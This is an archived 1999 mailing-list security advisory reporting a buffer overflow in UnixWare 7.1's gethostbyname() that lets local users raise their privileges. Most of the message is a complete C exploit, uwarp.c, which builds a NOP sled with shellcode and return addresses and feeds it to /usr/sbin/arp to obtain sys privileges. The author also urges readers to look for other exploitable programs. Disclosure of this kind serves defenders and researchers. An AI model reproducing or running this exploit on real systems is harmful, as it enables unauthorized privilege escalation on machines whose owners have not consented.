The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


UnixWare 7 gethostbyname() overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 2 Dec 1999 09:22:57 MST
From: Brock Tellier <[email protected]>
To: [email protected]
Subject: UnixWare 7 gethostbyname() overflow

Greetings,

OVERVIEW
A serious bug exists in UnixWare 7.1's libc.  A buffer overflow in
gethostbyname() will allow any user to obtain elevated privileges.

BACKGROUND
Is this the same gethostbyname() overflow which was present in ancient 
versions of non-unixware libc's way back when?  I can't say for sure, but
given SCO's record of fixing known holes (remember the OpenServer 5
Xtlib overflows, still present four years after they were known?), I 
wouldn't doubt it.

DETAILS
Any program which uses gethostbyname() with user-defined input is
vulnerable to a buffer overflow attack.  These overflows come with
various eases of exploitability.  My demonstration program happened to
be "arp", but any program calling this function will do.  When exploiting
the dozens of programs vulnerable to this hole, don't forget to check
your /etc/security/tcb/privs file for other non-suid programs which may
allow you to elevate your privileges as well. See my uidadmin advisory
for more info on UW7's privilege system.

EXPLOIT
--- uwarp.c ---
/**
 ** UnixWare 7.1 arp exploit yields gid of sys 
 ** Demonstrates overflow in uw71's gethostbyname()
 ** use offsets of +-100
 ** Brock Tellier [email protected]
 **	  
 **/ 


#include <stdlib.h>
#include <stdio.h>

char scoshell[]= 
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90

/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx
unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}
*/

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];
 
 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
	exit(0); 
 }
 else if (argc == 2){
   offset=atoi(argv[1]);
   
 }
 else if (argc == 3) {
  offset=atoi(argv[1]);
  buflen=atoi(argv[2]); 
   
 }
 else {
   offset=100;
   buflen=3000;

 }
 

addr=0x8046b75 + offset;

fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");
fprintf(stderr, "Brock Tellier [email protected]\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
	*(int *)&buf[i]=addr;

execl("/usr/sbin/arp", "arp", buf,
NULL);

exit(0);
}

------
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру